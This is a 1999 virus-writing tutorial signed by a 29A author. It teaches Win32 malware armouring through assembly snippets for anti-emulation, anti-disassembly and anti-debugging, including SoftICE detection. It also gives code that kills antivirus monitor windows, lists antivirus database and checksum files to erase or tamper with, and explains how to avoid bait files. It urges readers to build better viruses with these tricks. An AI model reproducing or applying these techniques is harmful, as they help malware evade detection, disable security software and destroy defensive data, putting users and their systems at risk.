The followin' document is an education purpose only. Author isn't responsible for any misuse of the things written in this document.
Every good virus should be armoured. Armoured means have some features, by which will be harder to detect, harder to emulate, harder to disassemble, harder to trace, harder to monitor or harder to understand. I will discuss here all techniques, which has some special meaning in virus programming.
Actually, there r many ways, how to protect virus against AVs and Averz under so weird interface as Win32 is. Something is often used, something isn't. Here is a "short" list of techniques, which I will describe:
Anti-Emulator - fool AVs by some tricks
By heuristic analysis, AVs SHOULD be find every virus, even unknown one. It worx like coder, which debugging some program. Heuristic scanner passes thru the code and looking for some suspicious code. It may be procedure for searching APIs, procedure to jump to ring-0, working with wildcards of executable files, opening executable file for write etc... Heuristic analysis is very good idea, nevertheless, not very well realised. AVs have many bugs and "sometimes", they can't recognize viral code. Some heuristic scanners have problems with undocumented opcodes, another scanners can't work with selectors and almost every scanner can't handle stack properly. Here r the techniques, which r used by many viruses and which still seems to be problem for heuristic scanners:
mov eax, ds ;load DS push eax ;some pop ds ;stuff mov ebx, ds ;load DS again cmp eax, ebx ;compare selectors jne emul_present ;if not same, quit
mov edx, esp ;load ESP push cs ;some pop eax ;stuff cmp esp, edx ;compare stack pointer jne emul_present ;quit if not equal
push cs ;store CS push offset label ;store address of procedure retf ;and go there
db 0D6h ;SALC db 0F1h ;BPICE
Anti-Heuristics - fool AVs by advanced technologies
Anti-Emulator uses holes in heuristic scanners. But at Anti-Heuristic case, we uses more advanced technology to fool AVs. If AVerz were able to "patch" holes in AVs, here it won't be so easy. They will need to rebuild their emulator and add new features (e.g. support of SEH). In DOS-viruses beginnings, viruses tried to hook Int 0 (divide by zero) and then divided register by zero. This caused, that execution was redirected to another place. AVerz had to rebuild their heuristic analysis to support hooking of interrupt vectors. This is perfect example of anti-heuristic technology. Next good example is poly-layered polymorphic decryptor. Time didn't chang so much and we use similar techniques to cause AVs to support newer and newer techs. Here r some examples:
@SEH_SetupFrame <seh_proc> ;setup SEH handler to seh_proc xchg [edx], eax ;cause GP fault ... ;garbage code seh_proc: @SEH_RemoveFrame ;remove SEH handler ... ;code continue here
Some coderz call this technique as anti-emulator and previous as anti-heuristic. I don't know, which expresion is right (nobody knows :D) and I don't care. I think, that previous stuff was clear...
Anti-Analysis - fool disassemblers by some tricks
Good virus should use some tricks, by which some curious ppl (such as AVers) won't be able to analyse it much easy. Really, there ain't anything easier for AVer than open IDA or Sourcer and see whole code as it was original source. Static analysis is very frequently used to analyse virus, don't forget it. Those tricks r still same and some of them r also used as Anti-Debugging technique.
call label gdelta: db 0b8h ;MOV opcode label: pop ebp ;get delta offset ... ;next code mov eax, [ebp + variable - gdelta] ;example of handling EBP
jmp opcd+1 ;jump into instruction opcd: mov eax, 0fcebfa90h ;NOP, CLI, infinite loop
proc1: movzx ecx, word ptr [edi+4] ;some code ret ;quit from procedure db 0b8h ;prefix (MOV EAX, ...) proc2: mov eax, [edi+3ch] ;some code ret ;quit from procedure
call label patch: ... ;some garbage code jmp shit ;... ... ;normal code label: mov [patch], 90909090h ;overwrite garbage with NOPs ret ;and quit from procedure
Anti-Debug - harder to analyse
In previous examples we tried to fool machines - emulators and disassemblers. But now, we will try to fool AVerz, and that's very hard. AVerz aren't dumb (mmm, ofcoz there r some exceptions :D), so it is very important to make analysis of your virus harder. As much as possible. If virus cannot be analysed by disassembler, AVerz uses debuggers. Debuggers r easily detectable (Win32 interface allows it to us), but their detection mechanism shouldn't be very visible (AVerz can simply jump over the code).
call IsDebuggerPresent ;call API xchg eax, ecx ;result to ECX jecxz debugger_not_present ;if ZERO, debugger not present
mov ecx, fs:[20h] ;load context of debugger jecxz debugger_not_present ;if ZERO, debugger not present
mov eax, 202h ;SoftICE ID number VxDCall Get_DDB ;call service xchg eax, ecx ;result to ECX jecxz sice_not_present ;SoftICE not present
xor eax, eax ;EAX=0 push eax ;parameters push 4000000h ;for push eax ;CreateFileA push eax ;API push eax ;function push eax ;... push offset sice ;name of driver call CreateFileA ;open driver inc eax ;is EAX==0? je sice_not_present ;yeah, SoftICE is not present dec eax ;no, push eax ;close its handle call CloseHandle ;... ... ;and make some action sice db '\\.\SICE',0 ;SICE driver under Win9X ;sice db '\\.\NTICE',0 ;SICE driver under WinNT
mov eax, '****' ;set already_infected mark mov dr0, eax ;to dr0
Anti-Monitor - killing watch-dogs
Resident shields (monitors) r resident programs used to catch viruses. Monitors r activated, when executable files (usually) r opened, closed, executed, etc... Virus can be cought by monitor not only when infected file is being executing, but also when file is being copying. This on-line virus security is very efficent and many stupid users have installed some monitor. That's a problem. If monitor is installed as standard Win32 application in memory, it won't be big problem to get rid of that. Bad stuff is that this code doesn't work on AVs, which use special driver (VxD, WDM, ...) to control file access.
Firstly we have to find window, which will we close. We will use FindWindowA API:
wAVP db 'AVP Monitor',0 ;window title ... mov eax, offset wAVP ;window title push eax ;push parameter cdq ;EDX=0 push edx ;window class - NULL call FindWindowA ;find window xchg eax, ecx ;swap EAX with ECX jecxz quit ;if ECX=0, quit
If AVP monitor window exists, we have window handle in EAX register. Otherwise, EAX is NULL. We will use that handle to send close message:
push edx ;NULL parameter push edx ;NULL parameter push 12h ;WM_QUIT message push ecx ;window handle call PostMessageA ;send message!
Geee, and AVP monitor is away! I also tested it with NODICE and it also worked. U can close another monitors, if u know titles of their windows.
Anti-Antivirus - destroy your enemy!
If u wanna be sure, that stupid user won't find your virus, then correct that "problem" on AV side - erase or modify AV crc files and AV databases. Here r the most important files, which should be erased (mm, but don't forget that after u delete viral database, AV won't run) or in better case - only modified (e.g. delete virus from database):
*.AVC -AVP viral database
AVP.CRC -AVP crc file
*.VDB -DrWeb viral database
NOD32.000 -NODICE viral database
ANTI-VIR.DAT -TBAV crc file
CHKLIST.MS -MSAV crc file
Anti-Bait - don't infect AV files
Baits r mostly silly do-nothing programs and the only one purpose of their existency is to be infected by virus. That program can be easily analysed, easier than winword.exe, for example. And becoz we wanna make job to AVs as hard as possible, we r tryin' to not infect those shitty programs. Baits r usualy named as 00000000.EXE, 00000001.EXE, 00000002.EXE, etc. The first advice is don't infect files with digits in its name. But take care! Many normal programs has digits in its name, such as winrar95.exe or wincmd32.exe. So, if u don't wanna infect baits, but wanna infect standard applications, check, if filename contains digits at all 4, 6 or 8 positions. How easy...X-D
I hope this article will help u with coding under Win32 and u will find it useful. If u didn't understand everything, then read it again or cotact your netwerk supervisor :)). Don't forget to use some techniques from this article to be sure your virus will be better than average.
Benny / 29A, 1999